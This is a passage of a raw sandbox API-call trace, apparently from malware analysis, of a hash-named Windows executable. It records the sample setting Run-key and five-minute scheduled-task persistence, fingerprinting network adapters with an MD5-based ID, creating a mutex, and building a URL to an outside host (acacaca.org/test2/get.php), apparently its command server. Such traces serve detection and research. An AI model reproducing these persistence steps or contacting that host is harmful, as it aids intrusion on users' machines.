lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0104.036] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x400000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe") returned 0x44 [0104.036] CloseHandle (hObject=0x4e4) returned 1 [0104.042] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x28) returned 0x2c9ec0 [0104.042] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2dbe38 [0104.042] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2af4dd0 [0104.042] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2af5038 [0104.042] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2afe7d0 [0104.042] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2afea38 [0104.042] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2afeca0 [0104.042] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2afef08 [0104.042] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2aff170 [0104.042] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2aff3d8 [0104.042] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2aff640 [0104.048] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18ea40 | out: phkResult=0x18ea40*=0x4e4) returned 0x0 [0104.048] RegQueryValueExW (in: hKey=0x4e4, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18ea3c, lpData=0x18d168, lpcbData=0x18ea20*=0x400 | out: lpType=0x18ea3c*=0x2, lpData="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --AutoStart", lpcbData=0x18ea20*=0x132) returned 0x0 [0104.048] RegCloseKey (hKey=0x4e4) returned 0x0 [0104.048] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x140) returned 0x2b01af0 [0104.048] lstrlenA (lpString="\" --AutoStart") returned 13 [0104.048] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x120) returned 0x2d9558 [0104.049] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b01af0 | out: hHeap=0x2a0000) returned 1 [0104.049] PathFileExistsW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe") returned 1 [0104.049] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x120) returned 0x2b01af0 [0104.050] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2d9558 | out: hHeap=0x2a0000) returned 1 [0104.050] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x120) returned 0x2d9558 [0104.050] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x120) returned 0x39e670 [0104.050] CoInitialize (pvReserved=0x0) returned 0x0 [0104.071] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0104.078] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x120) returned 0x2acf4e8 [0104.078] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18ea2c | out: ppv=0x18ea2c*=0x62ff68) returned 0x0 [0104.088] TaskScheduler:ITaskService:Connect (This=0x62ff68, serverName=0x18e4b8*(varType=0x0, wReserved1=0x2d, wReserved2=0x9550, wReserved3=0x2d, varVal1=0x8f, varVal2=0x120), user=0x18e4c8*(varType=0x0, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1=0x0, varVal2=0x128), domain=0x18e4d8*(varType=0x0, wReserved1=0x0, wReserved2=0x120, wReserved3=0x0, varVal1=0x8f, varVal2=0x7), password=0x18e4e8*(varType=0x0, wReserved1=0x2af, wReserved2=0xe9d4, wReserved3=0x18, varVal1=0x420cab, varVal2=0x2a0000)) returned 0x0 [0104.097] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0xc) returned 0x2b02380 [0104.097] TaskScheduler:ITaskService:GetFolder (in: This=0x62ff68, Path="\\", ppFolder=0x18ea34 | out: ppFolder=0x18ea34*=0x2620448) returned 0x0 [0104.101] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b02380 | out: hHeap=0x2a0000) returned 1 [0104.101] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0xc) returned 0x2b02380 [0104.101] ITaskFolder:DeleteTask (This=0x2620448, Name="Time Trigger Task", flags=0) returned 0x0 [0104.323] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b02380 | out: hHeap=0x2a0000) returned 1 [0104.323] TaskScheduler:ITaskService:NewTask (in: This=0x62ff68, flags=0x0, ppDefinition=0x18ea38 | out: ppDefinition=0x18ea38*=0x26204a0) returned 0x0 [0104.323] TaskScheduler:IUnknown:Release (This=0x62ff68) returned 0x1 [0104.323] ITaskDefinition:get_RegistrationInfo (in: This=0x26204a0, ppRegistrationInfo=0x18ea0c | out: ppRegistrationInfo=0x18ea0c*=0x2620560) returned 0x0 [0104.323] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0xc) returned 0x2b023b0 [0104.324] IRegistrationInfo:put_Author (This=0x2620560, Author="Author Name") returned 0x0 [0104.324] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b023b0 | out: hHeap=0x2a0000) returned 1 [0104.324] IUnknown:Release (This=0x2620560) returned 0x1 [0104.324] ITaskDefinition:get_Principal (in: This=0x26204a0, ppPrincipal=0x18ea14 | out: ppPrincipal=0x18ea14*=0x26206f0) returned 0x0 [0104.324] IPrincipal:put_LogonType (This=0x26206f0, LogonType=3) returned 0x0 [0104.324] IUnknown:Release (This=0x26206f0) returned 0x1 [0104.324] ITaskDefinition:get_Settings (in: This=0x26204a0, ppSettings=0x18ea1c | out: ppSettings=0x18ea1c*=0x2620610) returned 0x0 [0104.324] ITaskSettings:put_StartWhenAvailable (This=0x2620610, StartWhenAvailable=1) returned 0x0 [0104.324] IUnknown:Release (This=0x2620610) returned 0x1 [0104.324] ITaskSettings:get_IdleSettings (in: This=0x2620610, ppIdleSettings=0x18ea00 | out: ppIdleSettings=0x18ea00*=0x2620680) returned 0x0 [0104.325] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0xc) returned 0x2b023b0 [0104.325] IIdleSettings:put_WaitTimeout (This=0x2620680, WaitTimeout="PT5M") returned 0x0 [0104.325] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b023b0 | out: hHeap=0x2a0000) returned 1 [0104.325] IUnknown:Release (This=0x2620680) returned 0x1 [0104.325] ITaskDefinition:get_Triggers (in: This=0x26204a0, ppTriggers=0x18e9fc | out: ppTriggers=0x18e9fc*=0x26205d0) returned 0x0 [0104.325] ITriggerCollection:Create (in: This=0x26205d0, Type=1, ppTrigger=0x18ea08 | out: ppTrigger=0x18ea08*=0x2620750) returned 0x0 [0104.325] IUnknown:Release (This=0x26205d0) returned 0x1 [0104.325] IUnknown:QueryInterface (in: This=0x2620750, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18ea24 | out: ppvObject=0x18ea24*=0x2620750) returned 0x0 [0104.325] IUnknown:Release (This=0x2620750) returned 0x2 [0104.325] ITrigger:get_Repetition (in: This=0x2620750, ppRepeat=0x18ea10 | out: ppRepeat=0x18ea10*=0x26207a0) returned 0x0 [0104.325] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0xc) returned 0x2b023b0 [0104.326] IRepetitionPattern:put_Interval (This=0x26207a0, Interval="PT5M") returned 0x0 [0104.326] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b023b0 | out: hHeap=0x2a0000) returned 1 [0104.326] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0xc) returned 0x2b023b0 [0104.326] IRepetitionPattern:put_Duration (This=0x26207a0, Duration="") returned 0x0 [0104.326] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b023b0 | out: hHeap=0x2a0000) returned 1 [0104.326] ITrigger:put_Repetition (This=0x2620750, Repetition=0x26207a0) returned 0x0 [0104.326] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0xc) returned 0x2b023b0 [0104.326] ITrigger:put_Id (This=0x2620750, Id="Trigger1") returned 0x0 [0104.326] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b023b0 | out: hHeap=0x2a0000) returned 1 [0104.326] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0xc) returned 0x2b023b0 [0104.326] ITrigger:put_EndBoundary (This=0x2620750, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0104.326] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b023b0 | out: hHeap=0x2a0000) returned 1 [0104.326] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18e4e4 | out: lpSystemTimeAsFileTime=0x18e4e4*(dwLowDateTime=0xa50df9c0, dwHighDateTime=0x1d8a8d3)) [0104.334] GetLastError () returned 0x0 [0104.334] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x24) returned 0x2afd488 [0104.334] GetLastError () returned 0x0 [0104.334] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x2 [0104.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="W. Europe Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18e44c | out: lpMultiByteStr="W. Europe Standard Time", lpUsedDefaultChar=0x18e44c) returned 24 [0104.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="W. Europe Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18e44c | out: lpMultiByteStr="W. Europe Daylight Time", lpUsedDefaultChar=0x18e44c) returned 24 [0104.425] GetLastError () returned 0x0 [0104.426] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x24) returned 0x2afd428 [0104.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5000b8, cbMultiByte=-1, lpWideCharStr=0x2afd428, cchWideChar=18 | out: lpWideCharStr="%Y-%m-%dT%H:%M:%S") returned 18 [0104.426] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0xa0) returned 0x2ad76e0 [0104.426] GetLastError () returned 0x0 [0104.426] ITrigger:put_StartBoundary (This=0x2620750, StartBoundary="2022-08-05T16:20:56") returned 0x0 [0104.426] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b023b0 | out: hHeap=0x2a0000) returned 1 [0104.426] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b776e8 | out: hHeap=0x2a0000) returned 1 [0104.426] IUnknown:Release (This=0x2620750) returned 0x1 [0104.426] ITaskDefinition:get_Actions (in: This=0x26204a0, ppActions=0x18ea18 | out: ppActions=0x18ea18*=0x2620518) returned 0x0 [0104.426] IActionCollection:Create (in: This=0x2620518, Type=0, ppAction=0x18ea04 | out: ppAction=0x18ea04*=0x26207e8) returned 0x0 [0104.427] IUnknown:Release (This=0x2620518) returned 0x1 [0104.427] IUnknown:QueryInterface (in: This=0x26207e8, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18ea20 | out: ppvObject=0x18ea20*=0x26207e8) returned 0x0 [0104.427] IUnknown:Release (This=0x26207e8) returned 0x2 [0104.427] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0xc) returned 0x2b023b0 [0104.427] IExecAction:put_Path (This=0x26207e8, Path="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe") returned 0x0 [0104.427] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b023b0 | out: hHeap=0x2a0000) returned 1 [0104.427] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0xc) returned 0x2b023b0 [0104.427] IExecAction:put_Arguments (This=0x26207e8, Arguments="--Task") returned 0x0 [0104.427] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b023b0 | out: hHeap=0x2a0000) returned 1 [0104.427] IUnknown:Release (This=0x26207e8) returned 0x1 [0104.427] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0xc) returned 0x2b023b0 [0104.428] ITaskFolder:RegisterTaskDefinition (in: This=0x2620448, Path="Time Trigger Task", pDefinition=0x26204a0, flags=6, UserId=0x18e4c0*(varType=0x0, wReserved1=0x2af, wReserved2=0xe9d4, wReserved3=0x18, varVal1=0x420cab, varVal2=0x2a0000), password=0x18e4d0*(varType=0x0, wReserved1=0x0, wReserved2=0x120, wReserved3=0x0, varVal1=0x8f, varVal2=0x7), LogonType=3, sddl=0x18e4e4*(varType=0x8, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1="", varVal2=0x128), ppTask=0x18e9ec | out: ppTask=0x18e9ec*=0x2620868) returned 0x0 [0104.511] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b023b0 | out: hHeap=0x2a0000) returned 1 [0104.511] TaskScheduler:IUnknown:Release (This=0x2620448) returned 0x0 [0104.511] TaskScheduler:IUnknown:Release (This=0x26204a0) returned 0x0 [0104.511] IUnknown:Release (This=0x2620868) returned 0x0 [0104.511] CoUninitialize () [0104.517] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2acf4e8 | out: hHeap=0x2a0000) returned 1 [0104.518] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x39e670 | out: hHeap=0x2a0000) returned 1 [0104.518] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2d9558 | out: hHeap=0x2a0000) returned 1 [0104.518] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x2e9920 [0104.519] OpenServiceW (hSCManager=0x2e9920, lpServiceName="MYSQL", dwDesiredAccess=0x20) returned 0x0 [0104.520] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x40) returned 0x2afc020 [0104.521] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2affca8 [0104.521] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2afff10 [0104.521] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b76eb8 [0104.521] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b77120 [0104.522] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b0c820 [0104.522] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b0ca88 [0104.522] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b0ccf0 [0104.522] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b0cf58 [0104.522] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b0d1c0 [0104.522] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b0d428 [0104.523] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b0d690 [0104.523] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b0d8f8 [0104.523] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b0db60 [0104.523] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b0ddc8 [0104.523] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b0e030 [0104.523] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b0e298 [0104.523] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x50) returned 0x2b2ee18 [0104.524] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x50) returned 0x2b2edc0 [0104.524] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41dbd0, lpParameter=0x2afd6c8, dwCreationFlags=0x0, lpThreadId=0x513258 | out: lpThreadId=0x513258*=0xf04) returned 0x504 [0104.878] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b2ee18 | out: hHeap=0x2a0000) returned 1 [0104.878] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x28) returned 0x2afd3f8 [0104.878] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b0e500 [0104.883] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b0e768 [0104.883] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b0e9d0 [0104.883] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b0ec38 [0104.884] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b0eea0 [0104.884] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b0f108 [0104.884] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b0f370 [0104.884] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b0f5d8 [0104.884] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b0f840 [0104.884] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b0faa8 [0104.884] lstrlenA (lpString="http://acacaca.org/test2/get.php") returned 32 [0104.884] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x42) returned 0x2b383a0 [0104.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b0e500, cbMultiByte=-1, lpWideCharStr=0x2b383a0, cchWideChar=33 | out: lpWideCharStr="http://acacaca.org/test2/get.php") returned 33 [0104.884] lstrcatW (in: lpString1="", lpString2="http://acacaca.org/test2/get.php" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0104.884] lstrlenA (lpString="") returned 0 [0104.884] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x2) returned 0x2aec4b0 [0104.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b0e768, cbMultiByte=-1, lpWideCharStr=0x2aec4b0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0104.884] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0104.884] lstrlenA (lpString="") returned 0 [0104.884] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x2) returned 0x2aec4e0 [0104.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b0e9d0, cbMultiByte=-1, lpWideCharStr=0x2aec4e0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0104.884] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0104.884] lstrlenA (lpString="") returned 0 [0104.884] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x2) returned 0x2aec500 [0104.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b0ec38, cbMultiByte=-1, lpWideCharStr=0x2aec500, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0104.884] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0104.884] lstrlenA (lpString="") returned 0 [0104.884] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x2) returned 0x2aec4f0 [0104.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b0eea0, cbMultiByte=-1, lpWideCharStr=0x2aec4f0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0104.884] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0104.884] lstrlenA (lpString="") returned 0 [0104.885] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x2) returned 0x2aec470 [0104.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b0f108, cbMultiByte=-1, lpWideCharStr=0x2aec470, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0104.885] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0104.885] lstrlenA (lpString="") returned 0 [0104.885] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x2) returned 0x2aec4d0 [0104.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b0f370, cbMultiByte=-1, lpWideCharStr=0x2aec4d0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0104.885] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0104.885] lstrlenA (lpString="") returned 0 [0104.885] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x2) returned 0x2aec4a0 [0104.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b0f5d8, cbMultiByte=-1, lpWideCharStr=0x2aec4a0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0104.885] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0104.885] lstrlenA (lpString="") returned 0 [0104.885] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x2) returned 0x2aec480 [0104.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b0f840, cbMultiByte=-1, lpWideCharStr=0x2aec480, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0104.885] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0104.885] lstrlenA (lpString="") returned 0 [0104.885] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x2) returned 0x2aec450 [0104.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b0faa8, cbMultiByte=-1, lpWideCharStr=0x2aec450, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0104.885] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0104.885] lstrlenW (lpString="") returned 0 [0104.885] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x12) returned 0x2b158a0 [0104.885] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x288) returned 0x2b77388 [0104.885] GetAdaptersInfo (in: AdapterInfo=0x2b77388, SizePointer=0x18ea04 | out: AdapterInfo=0x2b77388, SizePointer=0x18ea04) returned 0x0 [0105.770] GetAdaptersInfo (in: AdapterInfo=0x2b77388, SizePointer=0x18ea04 | out: AdapterInfo=0x2b77388, SizePointer=0x18ea04) returned 0x0 [0105.779] GetLastError () returned 0x0 [0105.808] GetLastError () returned 0x0 [0105.809] CryptAcquireContextW (in: phProv=0x18e9d4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18e9d4*=0x2f7d48) returned 1 [0105.810] CryptCreateHash (in: hProv=0x2f7d48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18e9dc | out: phHash=0x18e9dc) returned 1 [0105.810] CryptHashData (hHash=0x2ac5708, pbData=0x2d3b98, dwDataLen=0x11, dwFlags=0x0) returned 1 [0105.810] CryptGetHashParam (in: hHash=0x2ac5708, dwParam=0x2, pbData=0x0, pdwDataLen=0x18e9d8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18e9d8) returned 1 [0105.810] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x11) returned 0x2b158e0 [0105.810] CryptGetHashParam (in: hHash=0x2ac5708, dwParam=0x2, pbData=0x2b158e0, pdwDataLen=0x18e9d8, dwFlags=0x0 | out: pbData=0x2b158e0, pdwDataLen=0x18e9d8) returned 1 [0105.810] GetLastError () returned 0x0 [0105.811] CryptDestroyHash (hHash=0x2ac5708) returned 1 [0105.811] CryptReleaseContext (hProv=0x2f7d48, dwFlags=0x0) returned 1 [0105.811] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2d3b98 | out: hHeap=0x2a0000) returned 1 [0105.811] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x30) returned 0x2b4d6e0 [0105.811] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b4d7c0 | out: hHeap=0x2a0000) returned 1 [0105.811] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b03b60 | out: hHeap=0x2a0000) returned 1 [0105.811] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41e690, lpParameter=0x513270, dwCreationFlags=0x0, lpThreadId=0x51325c | out: lpThreadId=0x51325c*=0xf08) returned 0x528 [0106.109] WaitForSingleObject (hHandle=0x528, dwMilliseconds=0xffffffff) returned 0x0 [0112.184] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}") returned 0x530 [0112.209] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x28) returned 0x2afd638 [0112.209] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b101e0 [0112.221] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2b10448 [0112.221] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb7910 [0112.221] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb7b78 [0112.221] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb7de0 [0112.221] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb8048 [0112.221] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb82b0 [0112.221] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb8518 [0112.221] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 